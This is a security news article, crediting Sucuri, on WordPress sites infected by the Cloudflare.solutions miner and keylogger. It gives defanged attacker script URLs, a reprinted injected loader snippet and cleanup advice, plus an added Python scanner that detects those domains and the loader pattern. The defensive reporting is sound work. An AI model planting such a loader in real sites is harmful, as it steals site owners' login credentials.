Over 5 thousand WordPress sites infected with a keylogger

Security researchers have been aware of the crypto-mining malware known as Cloudflare.solutions for some time, but a new development in the story has been revealed. The malicious software was first discovered in April, and its main objective at that time was to mine crypto-currency. It now appears that the malware has been updated to include a keylogger. An estimated 5,400 WordPress websites are compromised.

Cloudflare.solutions malware injects malicious scripts for a Monero miner and a keylogger

As you know, keyloggers are created to steal information: credentials, personal information, bank account details. The keylogger targeting WordPress websites steals data such as usernames and passwords, but it could also be aiming at much bigger prizes.

Cloudflare.solutions malware

To put the Cloudflare.solutions malware into action, hackers have to find improperly secured WordPress websites. These are usually sites that have not been updated for quite some time and therefore have security gaps that crooks can take advantage of. The hackers exploit the unpatched vulnerabilities and inject malicious code into the CMS's files.

According to the analysis, the Cloudflare.solutions malware uses the keylogger on the admin login page and the miner on the site's frontend. The injected crypto-miner has been found to generate Monero. Researchers from Sucuri have also listed several malicious scripts that are injected into vulnerable websites:

• hxxps://cdjs[.]online/lib.js
• hxxps://cdjs[.]online/lib.js?ver=…
• hxxps://cdns[.]ws/lib/googleanalytics.js?ver=…
• hxxps://msdns[.]online/lib/mnngldr.js?ver=…
• hxxps://msdns[.]online/lib/klldr.js

Researchers explain that even more WordPress websites could fall victim to the Cloudflare.solutions malware. To secure your site, we encourage you to update it regularly. This will guarantee that hackers won't be able to find any loopholes that allow them to inject malicious code.

For those whose WordPress websites have become infected with Cloudflare.solutions virus

If you are one of the unfortunate website owners in control of a compromised website, we have a few recommendations. To get rid of the malicious code, you have to remove the scripts from the theme's functions.php and scan the wp_posts table for injections. Of course, you should also change all your passwords without delay. Remember that, to maintain your website and keep it running smoothly, you must keep your server software up to date. For additional protection, we suggest using a Website Firewall.

Keylogger loads this code into vulnerable domains:

// Injected loader: creates a deferred <script> element pointing at the keylogger (URL defanged)
var snf = document.createElement("script");
snf.type = "text/javascript";
snf.setAttribute("defer", "defer");
snf.src = "hxxps://msdns[.]online/lib/kl.js";
document.head.appendChild(snf);
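The following is an added example, not code from the article or from Sucuri, that puts the two clean-up steps above into practice: it scans text from a wp_posts dump or a theme's functions.php for script references that resolve to the domains listed in the article, catching both a plain script tag and the dynamic loader pattern shown above. The sample rows are constructed for the example.

```python
import re
from typing import List, Tuple

# Domains the article lists as hosting the injected scripts (the page defangs them with [.]).
IOC_DOMAINS = ("cdjs.online", "cdns.ws", "msdns.online")

# A <script ... src="..."> tag pasted into post content or a theme file.
SCRIPT_TAG_RE = re.compile(r'<script[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)
# The dynamic loader pattern from the article: something.src = "https://.../kl.js";
DYNAMIC_SRC_RE = re.compile(r'\.src\s*=\s*["\'](h(?:tt|xx)ps?://[^"\']+)["\']', re.IGNORECASE)


def _host(url: str) -> str:
    """Lowercase hostname of a URL, tolerating the hxxps / [.] defanging used in reports."""
    url = url.replace("hxxp", "http").replace("[.]", ".")
    m = re.match(r'https?://([^/:?#]+)', url, re.IGNORECASE)
    return m.group(1).lower() if m else ""


def find_injections(text: str) -> List[Tuple[str, str]]:
    """Return (pattern, url) pairs for every script reference pointing at a listed domain."""
    hits = []
    for label, rx in (("script-tag", SCRIPT_TAG_RE), ("dynamic-loader", DYNAMIC_SRC_RE)):
        for url in rx.findall(text):
            host = _host(url)
            if any(host == d or host.endswith("." + d) for d in IOC_DOMAINS):
                hits.append((label, url))
    return hits


def scan_posts(rows) -> dict:
    """Scan wp_posts-style (ID, post_content) rows; return {ID: hits} for rows that match."""
    flagged = {}
    for post_id, content in rows:
        hits = find_injections(content or "")
        if hits:
            flagged[post_id] = hits
    return flagged


# Constructed sample rows standing in for a wp_posts dump (row 3 mimics the loader snippet).
SAMPLE_POSTS = [
    (1, "<p>Welcome to the site.</p>"),
    (2, '<p>Hello</p><script type="text/javascript" src="hxxps://cdjs[.]online/lib.js?ver=1.0.3"></script>'),
    (3, 'var snf = document.createElement("script"); snf.src = "hxxps://msdns[.]online/lib/kl.js"; document.head.appendChild(snf);'),
    (4, '<script src="https://cdn.example.com/jquery.min.js"></script>'),
]

if __name__ == "__main__":
    for pid, hits in scan_posts(SAMPLE_POSTS).items():
        print(f"post {pid}: {hits}")
```

The same find_injections() call can be run over the contents of functions.php, since the loader is plain text there as well.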

Source: blog.sucuri.net.
